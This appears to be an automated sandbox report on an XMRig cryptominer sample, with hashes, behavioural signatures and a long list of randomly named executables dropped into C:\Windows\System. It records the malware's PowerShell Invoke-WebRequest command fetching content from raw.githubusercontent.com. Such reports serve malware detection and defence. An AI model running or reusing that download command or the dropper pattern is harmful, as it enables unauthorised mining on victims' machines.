Malware Analysis Report

2024-11-16 12:08

Sample ID 240610-tnw6rasfra
Target b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a
SHA256 b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a
Tags
upx miner xmrig execution
score
10/10

Analysis Overview

score
10/10

SHA256

b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a

Threat Level: Known bad

The file b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Detects executables containing URLs to raw contents of a Github gist

Xmrig family

xmrig

UPX dump on OEP (original entry point)

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 16:12

Signatures

Detects executables containing URLs to raw contents of a Github gist

UPX dump on OEP (original entry point)

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 16:12

Reported

2024-06-10 16:15

Platform

win7-20240419-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

UPX dump on OEP (original entry point)

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

UPX packed file

upx

Drops file in Windows directory

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

Suspicious use of WriteProcessMemory

PID 1600 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oeTuQMk.exe
PID 1600 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oeTuQMk.exe
PID 1600 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oeTuQMk.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KQQYbkt.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KQQYbkt.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KQQYbkt.exe
PID 1600 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FqhLzMz.exe
PID 1600 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FqhLzMz.exe
PID 1600 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FqhLzMz.exe
PID 1600 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BUeDGoz.exe
PID 1600 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BUeDGoz.exe
PID 1600 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BUeDGoz.exe
PID 1600 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EnBLHui.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\WPRUOtZ.exe

C:\Windows\System\angYtBW.exe

C:\Windows\System\angYtBW.exe

C:\Windows\System\GShZDSU.exe

C:\Windows\System\GShZDSU.exe

C:\Windows\System\gXeyBLa.exe

C:\Windows\System\gXeyBLa.exe

C:\Windows\System\fGNSrJh.exe

C:\Windows\System\fGNSrJh.exe

C:\Windows\System\AvFeAvF.exe

C:\Windows\System\AvFeAvF.exe

C:\Windows\System\hoRIpJd.exe

C:\Windows\System\hoRIpJd.exe

C:\Windows\System\dSqNlEO.exe

C:\Windows\System\dSqNlEO.exe

C:\Windows\System\iYrSUyx.exe

C:\Windows\System\iYrSUyx.exe

C:\Windows\System\SuURBYO.exe

C:\Windows\System\SuURBYO.exe

C:\Windows\System\QBIyGJh.exe

C:\Windows\System\QBIyGJh.exe

C:\Windows\System\VrzgVLD.exe

C:\Windows\System\VrzgVLD.exe

C:\Windows\System\ZAsVZvp.exe

C:\Windows\System\ZAsVZvp.exe

C:\Windows\System\xnmzHLb.exe

C:\Windows\System\xnmzHLb.exe

C:\Windows\System\DGLgGmR.exe

C:\Windows\System\DGLgGmR.exe

C:\Windows\System\CwkhBBK.exe

C:\Windows\System\CwkhBBK.exe

C:\Windows\System\LCoAmPT.exe

C:\Windows\System\LCoAmPT.exe

C:\Windows\System\rdxlUGj.exe

C:\Windows\System\rdxlUGj.exe

C:\Windows\System\jrLLGxZ.exe

C:\Windows\System\jrLLGxZ.exe

C:\Windows\System\huAKBAw.exe

C:\Windows\System\huAKBAw.exe

C:\Windows\System\cIMOqfd.exe

C:\Windows\System\cIMOqfd.exe

C:\Windows\System\TBuxdOm.exe

C:\Windows\System\TBuxdOm.exe

C:\Windows\System\PVUufsb.exe

C:\Windows\System\PVUufsb.exe

C:\Windows\System\CDmQuIj.exe

C:\Windows\System\CDmQuIj.exe

C:\Windows\System\FyHWFGe.exe

C:\Windows\System\FyHWFGe.exe

C:\Windows\System\uwuFXzx.exe

C:\Windows\System\uwuFXzx.exe

C:\Windows\System\LryxTEt.exe

C:\Windows\System\LryxTEt.exe

C:\Windows\System\PZXuPYs.exe

C:\Windows\System\PZXuPYs.exe

C:\Windows\System\qCRVTjv.exe

C:\Windows\System\qCRVTjv.exe

C:\Windows\System\tjedGHp.exe

C:\Windows\System\tjedGHp.exe

C:\Windows\System\RQqEMQf.exe

C:\Windows\System\RQqEMQf.exe

C:\Windows\System\XsslTMt.exe

C:\Windows\System\XsslTMt.exe

C:\Windows\System\ikpyqVm.exe

C:\Windows\System\ikpyqVm.exe

C:\Windows\System\QvcDWGr.exe

C:\Windows\System\QvcDWGr.exe

C:\Windows\System\RHNNdQq.exe

C:\Windows\System\RHNNdQq.exe

C:\Windows\System\ktgdaMq.exe

C:\Windows\System\ktgdaMq.exe

C:\Windows\System\LzHHVzK.exe

C:\Windows\System\LzHHVzK.exe

C:\Windows\System\oAlURSK.exe

C:\Windows\System\oAlURSK.exe

C:\Windows\System\uJsdNBq.exe

C:\Windows\System\uJsdNBq.exe

C:\Windows\System\DdfXvXO.exe

C:\Windows\System\DdfXvXO.exe

C:\Windows\System\yBKYIJM.exe

C:\Windows\System\yBKYIJM.exe

C:\Windows\System\jkJefwy.exe

C:\Windows\System\jkJefwy.exe

C:\Windows\System\XJVZDIg.exe

C:\Windows\System\XJVZDIg.exe

C:\Windows\System\nwmxMFe.exe

C:\Windows\System\nwmxMFe.exe

C:\Windows\System\XRUhrfa.exe

C:\Windows\System\XRUhrfa.exe

C:\Windows\System\OIYwLQD.exe

C:\Windows\System\OIYwLQD.exe

C:\Windows\System\iwLHEET.exe

C:\Windows\System\iwLHEET.exe

C:\Windows\System\rueeNNr.exe

C:\Windows\System\rueeNNr.exe

C:\Windows\System\OZqgbnO.exe

C:\Windows\System\OZqgbnO.exe

C:\Windows\System\atbaVpO.exe

C:\Windows\System\atbaVpO.exe

C:\Windows\System\zGmpLmT.exe

C:\Windows\System\zGmpLmT.exe

C:\Windows\System\zloJZne.exe

C:\Windows\System\zloJZne.exe

C:\Windows\System\VaLIDRD.exe

C:\Windows\System\VaLIDRD.exe

C:\Windows\System\MNsOARS.exe

C:\Windows\System\MNsOARS.exe

C:\Windows\System\XfMjkfp.exe

C:\Windows\System\XfMjkfp.exe

C:\Windows\System\FlwkXXv.exe

C:\Windows\System\FlwkXXv.exe

C:\Windows\System\kZDgVBs.exe

C:\Windows\System\kZDgVBs.exe

C:\Windows\System\gEouEOa.exe

C:\Windows\System\gEouEOa.exe

C:\Windows\System\EZOmOjj.exe

C:\Windows\System\EZOmOjj.exe

C:\Windows\System\McODMBY.exe

C:\Windows\System\McODMBY.exe

C:\Windows\System\vpMNZdi.exe

C:\Windows\System\vpMNZdi.exe

C:\Windows\System\PethKHN.exe

C:\Windows\System\PethKHN.exe

C:\Windows\System\QlqAJHf.exe

C:\Windows\System\QlqAJHf.exe

C:\Windows\System\aXQXUKE.exe

C:\Windows\System\aXQXUKE.exe

C:\Windows\System\sEgHMMC.exe

C:\Windows\System\sEgHMMC.exe

C:\Windows\System\rDnumye.exe

C:\Windows\System\rDnumye.exe

C:\Windows\System\OpplrJo.exe

C:\Windows\System\OpplrJo.exe

C:\Windows\System\oGWvHbv.exe

C:\Windows\System\oGWvHbv.exe

C:\Windows\System\LDWYoLV.exe

C:\Windows\System\LDWYoLV.exe

C:\Windows\System\QulqqpJ.exe

C:\Windows\System\QulqqpJ.exe

C:\Windows\System\exdvxXl.exe

C:\Windows\System\exdvxXl.exe

C:\Windows\System\FTXDGSt.exe

C:\Windows\System\FTXDGSt.exe

C:\Windows\System\ebyYMEK.exe

C:\Windows\System\ebyYMEK.exe

C:\Windows\System\tOADpyz.exe

C:\Windows\System\tOADpyz.exe

C:\Windows\System\smwqEDV.exe

C:\Windows\System\smwqEDV.exe

C:\Windows\System\pqLmcpX.exe

C:\Windows\System\pqLmcpX.exe

C:\Windows\System\tVoEUzs.exe

C:\Windows\System\tVoEUzs.exe

C:\Windows\System\pQKmyvz.exe

C:\Windows\System\pQKmyvz.exe

C:\Windows\System\KzgPYaU.exe

C:\Windows\System\KzgPYaU.exe

C:\Windows\System\ZTcqPaV.exe

C:\Windows\System\ZTcqPaV.exe

C:\Windows\System\ZtFFpvv.exe

C:\Windows\System\ZtFFpvv.exe

C:\Windows\System\YkGumgd.exe

C:\Windows\System\YkGumgd.exe

C:\Windows\System\rfohWoO.exe

C:\Windows\System\rfohWoO.exe

C:\Windows\System\BQfIHWb.exe

C:\Windows\System\BQfIHWb.exe

C:\Windows\System\LbhPXKS.exe

C:\Windows\System\LbhPXKS.exe

C:\Windows\System\SUCKyyq.exe

C:\Windows\System\SUCKyyq.exe

C:\Windows\System\ayzRMqi.exe

C:\Windows\System\ayzRMqi.exe

C:\Windows\System\jwqtQIc.exe

C:\Windows\System\jwqtQIc.exe

C:\Windows\System\yhUiZbR.exe

C:\Windows\System\yhUiZbR.exe

C:\Windows\System\UBmBTei.exe

C:\Windows\System\UBmBTei.exe

C:\Windows\System\zaYfSzQ.exe

C:\Windows\System\zaYfSzQ.exe

C:\Windows\System\MVBdANL.exe

C:\Windows\System\MVBdANL.exe

C:\Windows\System\YAsykDx.exe

C:\Windows\System\YAsykDx.exe

C:\Windows\System\ybVsPRs.exe

C:\Windows\System\ybVsPRs.exe

C:\Windows\System\GqjAOUL.exe

C:\Windows\System\GqjAOUL.exe

C:\Windows\System\xfdXdLo.exe

C:\Windows\System\xfdXdLo.exe

C:\Windows\System\XXqzAgq.exe

C:\Windows\System\XXqzAgq.exe

C:\Windows\System\obsizEZ.exe

C:\Windows\System\obsizEZ.exe

C:\Windows\System\KDZagFi.exe

C:\Windows\System\KDZagFi.exe

C:\Windows\System\rxNwHiB.exe

C:\Windows\System\rxNwHiB.exe

C:\Windows\System\DrXhzlC.exe

C:\Windows\System\DrXhzlC.exe

C:\Windows\System\khOGjLp.exe

C:\Windows\System\khOGjLp.exe

C:\Windows\System\HoUrOrC.exe

C:\Windows\System\HoUrOrC.exe

C:\Windows\System\nTIFSux.exe

C:\Windows\System\nTIFSux.exe

C:\Windows\System\kXljFjL.exe

C:\Windows\System\kXljFjL.exe

C:\Windows\System\WLDfcGW.exe

C:\Windows\System\WLDfcGW.exe

C:\Windows\System\uAHslNf.exe

C:\Windows\System\uAHslNf.exe

C:\Windows\System\UDwrtHe.exe

C:\Windows\System\UDwrtHe.exe

C:\Windows\System\tbcZdRm.exe

C:\Windows\System\tbcZdRm.exe

C:\Windows\System\fgEYRls.exe

C:\Windows\System\fgEYRls.exe

C:\Windows\System\TGIDGuR.exe

C:\Windows\System\TGIDGuR.exe

C:\Windows\System\FnZqjlJ.exe

C:\Windows\System\FnZqjlJ.exe

C:\Windows\System\DGloPat.exe

C:\Windows\System\DGloPat.exe

C:\Windows\System\qRpNSBq.exe

C:\Windows\System\qRpNSBq.exe

C:\Windows\System\kLHTCKN.exe

C:\Windows\System\kLHTCKN.exe

C:\Windows\System\BcjjKzP.exe

C:\Windows\System\BcjjKzP.exe

C:\Windows\System\QEjABEk.exe

C:\Windows\System\QEjABEk.exe

C:\Windows\System\CzSVGZd.exe

C:\Windows\System\CzSVGZd.exe

C:\Windows\System\ePqGnoL.exe

C:\Windows\System\ePqGnoL.exe

C:\Windows\System\EejSkYm.exe

C:\Windows\System\EejSkYm.exe

C:\Windows\System\GxQETng.exe

C:\Windows\System\GxQETng.exe

C:\Windows\System\GBDGGhH.exe

C:\Windows\System\GBDGGhH.exe

C:\Windows\System\gqqzxUs.exe

C:\Windows\System\gqqzxUs.exe

C:\Windows\System\Wvmluqa.exe

C:\Windows\System\Wvmluqa.exe

C:\Windows\System\PkTDVrP.exe

C:\Windows\System\PkTDVrP.exe

C:\Windows\System\uurUeie.exe

C:\Windows\System\uurUeie.exe

C:\Windows\System\HBDyipk.exe

C:\Windows\System\HBDyipk.exe

C:\Windows\System\vEXvVwK.exe

C:\Windows\System\vEXvVwK.exe

C:\Windows\System\XZvPONF.exe

C:\Windows\System\XZvPONF.exe

C:\Windows\System\xIUaNSC.exe

C:\Windows\System\xIUaNSC.exe

C:\Windows\System\BNBnYrJ.exe

C:\Windows\System\BNBnYrJ.exe

C:\Windows\System\JTFEifs.exe

C:\Windows\System\JTFEifs.exe

C:\Windows\System\XaVpPFl.exe

C:\Windows\System\XaVpPFl.exe

C:\Windows\System\rJUvQFC.exe

C:\Windows\System\rJUvQFC.exe

C:\Windows\System\IvsIHGk.exe

C:\Windows\System\IvsIHGk.exe

C:\Windows\System\vJPaLzJ.exe

C:\Windows\System\vJPaLzJ.exe

C:\Windows\System\ylZwAHK.exe

C:\Windows\System\ylZwAHK.exe

C:\Windows\System\oXdcEUD.exe

C:\Windows\System\oXdcEUD.exe

C:\Windows\System\zDAnHjv.exe

C:\Windows\System\zDAnHjv.exe

C:\Windows\System\yEfziDq.exe

C:\Windows\System\yEfziDq.exe

C:\Windows\System\ZsplVvu.exe

C:\Windows\System\ZsplVvu.exe

C:\Windows\System\bxSiHqd.exe

C:\Windows\System\bxSiHqd.exe

C:\Windows\System\tqSZmpc.exe

C:\Windows\System\tqSZmpc.exe

C:\Windows\System\KKVEell.exe

C:\Windows\System\KKVEell.exe

C:\Windows\System\xYmAcUE.exe

C:\Windows\System\xYmAcUE.exe

C:\Windows\System\PxUKKnv.exe

C:\Windows\System\PxUKKnv.exe

C:\Windows\System\mcEIHhh.exe

C:\Windows\System\mcEIHhh.exe

C:\Windows\System\SNuMXka.exe

C:\Windows\System\SNuMXka.exe

C:\Windows\System\LQMveaG.exe

C:\Windows\System\LQMveaG.exe

C:\Windows\System\fgNLvtI.exe

C:\Windows\System\fgNLvtI.exe

C:\Windows\System\JZkgAvc.exe

C:\Windows\System\JZkgAvc.exe

C:\Windows\System\jMtvHyw.exe

C:\Windows\System\jMtvHyw.exe

C:\Windows\System\pIEepSe.exe

C:\Windows\System\pIEepSe.exe

C:\Windows\System\aOfVapP.exe

C:\Windows\System\aOfVapP.exe

C:\Windows\System\PlmjeUc.exe

C:\Windows\System\PlmjeUc.exe

C:\Windows\System\mbMnkCu.exe

C:\Windows\System\mbMnkCu.exe

C:\Windows\System\rxsxUrn.exe

C:\Windows\System\rxsxUrn.exe

C:\Windows\System\qWIjOFy.exe

C:\Windows\System\qWIjOFy.exe

C:\Windows\System\nCwTqUW.exe

C:\Windows\System\nCwTqUW.exe

C:\Windows\System\FGRRnhV.exe

C:\Windows\System\FGRRnhV.exe

C:\Windows\System\WeHGHsQ.exe

C:\Windows\System\WeHGHsQ.exe

C:\Windows\System\YGiUCLO.exe

C:\Windows\System\YGiUCLO.exe

C:\Windows\System\vzZcnst.exe

C:\Windows\System\vzZcnst.exe

C:\Windows\System\CfQOqdM.exe

C:\Windows\System\CfQOqdM.exe

C:\Windows\System\IQcNkrt.exe

C:\Windows\System\IQcNkrt.exe

C:\Windows\System\iXQWKCR.exe

C:\Windows\System\iXQWKCR.exe

C:\Windows\System\qipgVCF.exe

C:\Windows\System\qipgVCF.exe

C:\Windows\System\WFAFZwC.exe

C:\Windows\System\WFAFZwC.exe

C:\Windows\System\gyMPwYT.exe

C:\Windows\System\gyMPwYT.exe

C:\Windows\System\yzrslQS.exe

C:\Windows\System\yzrslQS.exe

C:\Windows\System\wrpEsUQ.exe

C:\Windows\System\wrpEsUQ.exe

C:\Windows\System\xYoHwNB.exe

C:\Windows\System\xYoHwNB.exe

C:\Windows\System\kkyoGTm.exe

C:\Windows\System\kkyoGTm.exe

C:\Windows\System\qVMZUlP.exe

C:\Windows\System\qVMZUlP.exe

C:\Windows\System\MajbPke.exe

C:\Windows\System\MajbPke.exe

C:\Windows\System\SMzumXU.exe

C:\Windows\System\SMzumXU.exe

C:\Windows\System\PfYJfzB.exe

C:\Windows\System\PfYJfzB.exe

C:\Windows\System\yvITSeh.exe

C:\Windows\System\yvITSeh.exe

C:\Windows\System\knrrRdc.exe

C:\Windows\System\knrrRdc.exe

C:\Windows\System\xuwZmXE.exe

C:\Windows\System\xuwZmXE.exe

C:\Windows\System\gFczhfQ.exe

C:\Windows\System\gFczhfQ.exe

C:\Windows\System\aQDonCy.exe

C:\Windows\System\aQDonCy.exe

C:\Windows\System\GZFTkOt.exe

C:\Windows\System\GZFTkOt.exe

C:\Windows\System\cbqEWbi.exe

C:\Windows\System\cbqEWbi.exe

C:\Windows\System\SUTBuAJ.exe

C:\Windows\System\SUTBuAJ.exe

C:\Windows\System\ZIPhmEX.exe

C:\Windows\System\ZIPhmEX.exe

C:\Windows\System\bnNFWMT.exe

C:\Windows\System\bnNFWMT.exe

C:\Windows\System\IAIbHvd.exe

C:\Windows\System\IAIbHvd.exe

C:\Windows\System\cGwgBZP.exe

C:\Windows\System\cGwgBZP.exe

C:\Windows\System\vhiJvvM.exe

C:\Windows\System\vhiJvvM.exe

C:\Windows\System\fGGrlPp.exe

C:\Windows\System\fGGrlPp.exe

C:\Windows\System\XltggtK.exe

C:\Windows\System\XltggtK.exe

C:\Windows\System\GKaIpUd.exe

C:\Windows\System\GKaIpUd.exe

C:\Windows\System\AorOMLi.exe

C:\Windows\System\AorOMLi.exe

C:\Windows\System\PYYiGvI.exe

C:\Windows\System\PYYiGvI.exe

C:\Windows\System\matLRbd.exe

C:\Windows\System\matLRbd.exe

C:\Windows\System\cqdNFDc.exe

C:\Windows\System\cqdNFDc.exe

C:\Windows\System\ExUVsDB.exe

C:\Windows\System\ExUVsDB.exe

C:\Windows\System\LYYREAz.exe

C:\Windows\System\LYYREAz.exe

C:\Windows\System\XfvOoRS.exe

C:\Windows\System\XfvOoRS.exe

C:\Windows\System\kQsYRle.exe

C:\Windows\System\kQsYRle.exe

C:\Windows\System\ALrwyWq.exe

C:\Windows\System\ALrwyWq.exe

C:\Windows\System\UMLyehe.exe

C:\Windows\System\UMLyehe.exe

C:\Windows\System\LrSTKVu.exe

C:\Windows\System\LrSTKVu.exe

C:\Windows\System\eiPSdAE.exe

C:\Windows\System\eiPSdAE.exe

C:\Windows\System\wtpAcGZ.exe

C:\Windows\System\wtpAcGZ.exe

C:\Windows\System\lzCpmRL.exe

C:\Windows\System\lzCpmRL.exe

C:\Windows\System\vBhwZGv.exe

C:\Windows\System\vBhwZGv.exe

C:\Windows\System\IDaPBYv.exe

C:\Windows\System\IDaPBYv.exe

C:\Windows\System\VYAyheA.exe

C:\Windows\System\VYAyheA.exe

C:\Windows\System\jNMsZQq.exe

C:\Windows\System\jNMsZQq.exe

C:\Windows\System\wngfCSQ.exe

C:\Windows\System\wngfCSQ.exe

C:\Windows\System\ILwqbBC.exe

C:\Windows\System\ILwqbBC.exe

C:\Windows\System\jvcBmZb.exe

C:\Windows\System\jvcBmZb.exe

C:\Windows\System\czOBapa.exe

C:\Windows\System\czOBapa.exe

C:\Windows\System\plkCrKt.exe

C:\Windows\System\plkCrKt.exe

C:\Windows\System\GAPIGwI.exe

C:\Windows\System\GAPIGwI.exe

C:\Windows\System\pAaLEAE.exe

C:\Windows\System\pAaLEAE.exe

C:\Windows\System\kIPPXOm.exe

C:\Windows\System\kIPPXOm.exe

C:\Windows\System\UngYCzM.exe

C:\Windows\System\UngYCzM.exe

C:\Windows\System\CIKsXvp.exe

C:\Windows\System\CIKsXvp.exe

C:\Windows\System\RuyMFPV.exe

C:\Windows\System\RuyMFPV.exe

C:\Windows\System\pgoWZPF.exe

C:\Windows\System\pgoWZPF.exe

C:\Windows\System\oxFVdEL.exe

C:\Windows\System\oxFVdEL.exe

C:\Windows\System\fOnRaiX.exe

C:\Windows\System\fOnRaiX.exe

C:\Windows\System\ROBRbmU.exe

C:\Windows\System\ROBRbmU.exe

C:\Windows\System\pScsLUQ.exe

C:\Windows\System\pScsLUQ.exe

C:\Windows\System\OENjXTe.exe

C:\Windows\System\OENjXTe.exe

C:\Windows\System\dsDlLCs.exe

C:\Windows\System\dsDlLCs.exe

C:\Windows\System\WgpyxDH.exe

C:\Windows\System\WgpyxDH.exe

C:\Windows\System\sywVHUL.exe

C:\Windows\System\sywVHUL.exe

C:\Windows\System\YLHlNnN.exe

C:\Windows\System\YLHlNnN.exe

C:\Windows\System\YsSQLDp.exe

C:\Windows\System\YsSQLDp.exe

C:\Windows\System\aawTkGZ.exe

C:\Windows\System\aawTkGZ.exe

C:\Windows\System\YGWVsuq.exe

C:\Windows\System\YGWVsuq.exe

C:\Windows\System\OSJzSfQ.exe

C:\Windows\System\OSJzSfQ.exe

C:\Windows\System\feJbtpC.exe

C:\Windows\System\feJbtpC.exe

C:\Windows\System\JmTHrGb.exe

C:\Windows\System\JmTHrGb.exe

C:\Windows\System\HMkpvuX.exe

C:\Windows\System\HMkpvuX.exe

C:\Windows\System\VdBAyzl.exe

C:\Windows\System\VdBAyzl.exe

C:\Windows\System\hZOHbSu.exe

C:\Windows\System\hZOHbSu.exe

C:\Windows\System\cXRIsvp.exe

C:\Windows\System\cXRIsvp.exe

C:\Windows\System\nsvQBRl.exe

C:\Windows\System\nsvQBRl.exe

C:\Windows\System\geiCcEs.exe

C:\Windows\System\geiCcEs.exe

C:\Windows\System\ZvcScvU.exe

C:\Windows\System\ZvcScvU.exe

C:\Windows\System\mlMluuY.exe

C:\Windows\System\mlMluuY.exe

C:\Windows\System\ueOsbIi.exe

C:\Windows\System\ueOsbIi.exe

C:\Windows\System\MQtQMcg.exe

C:\Windows\System\MQtQMcg.exe

C:\Windows\System\tErABKQ.exe

C:\Windows\System\tErABKQ.exe

C:\Windows\System\clYbVvQ.exe

C:\Windows\System\clYbVvQ.exe

C:\Windows\System\UYctauk.exe

C:\Windows\System\UYctauk.exe

C:\Windows\System\OIwrXUj.exe

C:\Windows\System\OIwrXUj.exe

C:\Windows\System\hifcjYu.exe

C:\Windows\System\hifcjYu.exe

C:\Windows\System\TRYSMjM.exe

C:\Windows\System\TRYSMjM.exe

C:\Windows\System\PxCrYRe.exe

C:\Windows\System\PxCrYRe.exe

C:\Windows\System\NCDzTzz.exe

C:\Windows\System\NCDzTzz.exe

C:\Windows\System\rcMOtOQ.exe

C:\Windows\System\rcMOtOQ.exe

C:\Windows\System\XqvdtQF.exe

C:\Windows\System\XqvdtQF.exe

C:\Windows\System\fgLycRV.exe

C:\Windows\System\fgLycRV.exe

C:\Windows\System\ccKOuYV.exe

C:\Windows\System\ccKOuYV.exe

C:\Windows\System\ypmxqmn.exe

C:\Windows\System\ypmxqmn.exe

C:\Windows\System\UpuQDne.exe

C:\Windows\System\UpuQDne.exe

C:\Windows\System\mzFwPfW.exe

C:\Windows\System\mzFwPfW.exe

C:\Windows\System\iBeXuya.exe

C:\Windows\System\iBeXuya.exe

C:\Windows\System\MzyuHhd.exe

C:\Windows\System\MzyuHhd.exe

C:\Windows\System\wtzbfAi.exe

C:\Windows\System\wtzbfAi.exe

C:\Windows\System\cpmFWOT.exe

C:\Windows\System\cpmFWOT.exe

C:\Windows\System\ZlODGgJ.exe

C:\Windows\System\ZlODGgJ.exe

C:\Windows\System\gJbOoIt.exe

C:\Windows\System\gJbOoIt.exe

C:\Windows\System\ESQPZRe.exe

C:\Windows\System\ESQPZRe.exe

C:\Windows\System\xmUtxtW.exe

C:\Windows\System\xmUtxtW.exe

C:\Windows\System\xMxAZSj.exe

C:\Windows\System\xMxAZSj.exe

C:\Windows\System\iTKsKiz.exe

C:\Windows\System\iTKsKiz.exe

C:\Windows\System\ZNWozFt.exe

C:\Windows\System\ZNWozFt.exe

C:\Windows\System\LygOfug.exe

C:\Windows\System\LygOfug.exe

C:\Windows\System\qoXKglO.exe

C:\Windows\System\qoXKglO.exe

C:\Windows\System\lRSgcxe.exe

C:\Windows\System\lRSgcxe.exe

C:\Windows\System\ijTlpcI.exe

C:\Windows\System\ijTlpcI.exe

C:\Windows\System\RCeBTyD.exe

C:\Windows\System\RCeBTyD.exe

C:\Windows\System\iSmGcFA.exe

C:\Windows\System\iSmGcFA.exe

C:\Windows\System\Gomjkjk.exe

C:\Windows\System\Gomjkjk.exe

C:\Windows\System\NUihwrQ.exe

C:\Windows\System\NUihwrQ.exe

C:\Windows\System\lfwlcTZ.exe

C:\Windows\System\lfwlcTZ.exe

C:\Windows\System\PFTsyxS.exe

C:\Windows\System\PFTsyxS.exe

C:\Windows\System\mBWtEDT.exe

C:\Windows\System\mBWtEDT.exe

C:\Windows\System\OisulfV.exe

C:\Windows\System\OisulfV.exe

C:\Windows\System\khAvSvg.exe

C:\Windows\System\khAvSvg.exe

C:\Windows\System\NEZeQKg.exe

C:\Windows\System\NEZeQKg.exe

C:\Windows\System\khvmODk.exe

C:\Windows\System\khvmODk.exe

C:\Windows\System\KxHmjFk.exe

C:\Windows\System\KxHmjFk.exe

C:\Windows\System\LSuZwHi.exe

C:\Windows\System\LSuZwHi.exe

C:\Windows\System\aqEMUxU.exe

C:\Windows\System\aqEMUxU.exe

C:\Windows\System\HefQZAj.exe

C:\Windows\System\HefQZAj.exe

C:\Windows\System\amREFTG.exe

C:\Windows\System\amREFTG.exe

C:\Windows\System\ggAYjjC.exe

C:\Windows\System\ggAYjjC.exe

C:\Windows\System\lxTjFNJ.exe

C:\Windows\System\lxTjFNJ.exe

C:\Windows\System\tvwqngA.exe

C:\Windows\System\tvwqngA.exe

C:\Windows\System\XfvGWgQ.exe

C:\Windows\System\XfvGWgQ.exe

C:\Windows\System\PtHjIJu.exe

C:\Windows\System\PtHjIJu.exe

C:\Windows\System\sLwmauP.exe

C:\Windows\System\sLwmauP.exe

C:\Windows\System\DqyYHAe.exe

C:\Windows\System\DqyYHAe.exe

C:\Windows\System\yTeGzip.exe

C:\Windows\System\yTeGzip.exe

C:\Windows\System\RUyalYf.exe

C:\Windows\System\RUyalYf.exe

C:\Windows\System\jzrrfJQ.exe

C:\Windows\System\jzrrfJQ.exe

C:\Windows\System\KeQusre.exe

C:\Windows\System\KeQusre.exe

C:\Windows\System\tJjMhjD.exe

C:\Windows\System\tJjMhjD.exe

C:\Windows\System\YFLCyUA.exe

